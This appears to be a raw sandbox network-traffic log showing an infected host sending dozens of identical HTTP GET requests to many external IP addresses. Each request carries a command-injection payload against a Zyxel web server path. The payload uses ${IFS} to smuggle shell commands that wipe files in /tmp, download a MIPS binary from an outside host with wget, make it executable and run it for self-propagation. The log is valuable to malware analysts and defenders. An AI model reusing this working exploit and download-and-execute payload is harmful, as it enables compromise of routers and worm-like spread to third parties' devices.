                                                Jan 28, 2024 10:16:10.588752985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                557192.168.2.235576893.68.75.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588766098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                558192.168.2.2337824182.129.241.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588829041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                559192.168.2.2350350175.120.89.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588839054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                560192.168.2.2346902138.173.202.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588844061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                561192.168.2.235838243.62.188.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588886023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                562192.168.2.2338564136.175.204.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588941097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                563192.168.2.2333232165.8.220.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588958979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                564192.168.2.234358462.207.37.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588983059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                565192.168.2.235928418.199.213.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.588999987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                566192.168.2.2344168184.163.54.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589018106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                567192.168.2.2349716157.124.89.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589046001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                568192.168.2.235229824.225.1.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589066982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                569192.168.2.2342722159.233.110.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589097023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                570192.168.2.2348434108.82.200.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589137077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                571192.168.2.2355400173.114.131.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589168072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                572192.168.2.234600881.23.141.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589191914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                573192.168.2.235484012.180.109.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589216948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                574192.168.2.233370813.76.49.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589251995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                575192.168.2.2337662114.28.169.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589266062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                576192.168.2.2343738155.213.44.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589325905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                577192.168.2.235936498.136.148.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589325905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                578192.168.2.2354476216.22.165.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589339018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                579192.168.2.234456831.122.111.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589346886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                580192.168.2.2340126221.127.117.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589384079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                581192.168.2.2336240177.211.250.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589400053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                582192.168.2.2357660126.235.27.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589411974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                583192.168.2.235046082.23.114.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589454889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                584192.168.2.2347580106.253.176.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589488029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                585192.168.2.2350454222.176.141.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589539051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                586192.168.2.2346896146.155.167.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589555979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                587192.168.2.2335196207.111.195.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589572906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                588192.168.2.235163238.202.18.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589610100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                589192.168.2.234969419.64.180.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589634895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                590192.168.2.235423451.249.229.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589647055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                591192.168.2.2334352135.246.32.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589678049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                592192.168.2.2340560218.188.64.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589709997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                593192.168.2.2348860105.73.144.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589732885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                594192.168.2.234887478.252.108.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589785099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                595192.168.2.2357698144.255.108.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589799881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                596192.168.2.2357510196.217.77.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589826107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                597192.168.2.2346244113.223.228.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589852095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                598192.168.2.233906852.99.176.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589879036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                599192.168.2.2337818206.204.71.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589890957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                600192.168.2.2358194176.10.63.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589914083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                601192.168.2.235245081.104.240.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589929104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                602192.168.2.2356514135.19.57.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.589975119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                603192.168.2.235323075.226.111.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590004921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                604192.168.2.234543643.166.123.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590004921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                605192.168.2.2358410120.175.129.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590048075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                606192.168.2.234107645.70.174.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590080976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                607192.168.2.233571838.131.175.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590116978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                608192.168.2.233506279.222.83.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590152979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                609192.168.2.234924694.109.196.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590162992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                610192.168.2.235821270.194.107.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590187073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                611192.168.2.234888034.149.39.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590223074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                612192.168.2.233749488.152.30.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590249062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                613192.168.2.2333866199.132.14.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590276003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                614192.168.2.23387548.135.45.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590308905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                615192.168.2.235889893.19.40.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590329885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                616192.168.2.2343580137.184.62.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590370893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                617192.168.2.235914214.167.34.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590414047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                618192.168.2.2341178128.176.48.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590445995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
